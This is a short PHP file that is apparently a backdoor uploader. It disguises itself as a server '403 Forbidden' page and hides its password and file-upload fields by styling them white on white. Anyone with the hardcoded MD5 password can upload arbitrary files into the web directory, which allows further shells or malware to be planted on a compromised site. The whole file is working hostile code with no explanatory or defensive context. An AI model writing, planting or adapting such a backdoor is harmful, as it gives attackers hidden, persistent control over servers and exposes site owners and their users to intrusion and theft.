<?
@session_start();
$p = "ce3e68c736a33cd0f6cca59bcba2578d";  //cange you password (hash md5) 
$pp = @(md5($_POST['pass']));
if($p==$pp)
{
$_SESSION['login'] = $pp;
}
if(isset($_SESSION['login'])&&isset($_FILES))
{
move_uploaded_file($_FILES['file']['tmp_name'],basename($_FILES['file']['name']));
#print_r($_FILES['file']['tmp_name'],basename($_FILES['file']['name']));
}
#print $_SESSION['login'];
?>
<html>
  <head>
    <title>403 Forbidden</title>
    <style type="text/css">
	input{
	margin:0;
	background-color:#fff;
	border:1px solid #fff;
	}
    </style>
   <H1>Forbidden</H1>
  </head>
  <body>
<p>You don't have permission to access on this server.</P>
<hr>
<address><?=trim(getenv("SERVER_SOFTWARE"))." Server at ".$_SERVER['HTTP_HOST'];?>  Port 80</address>
	<center><form method="post" enctype="multipart/form-data">
	<?if(isset($_SESSION['login'])){?><input type="file" name="file"><input type="submit" value="G@"><?}else{?>
        <input type="password" name="pass">
        <?}?>
      </form></center>
  </body>
</html>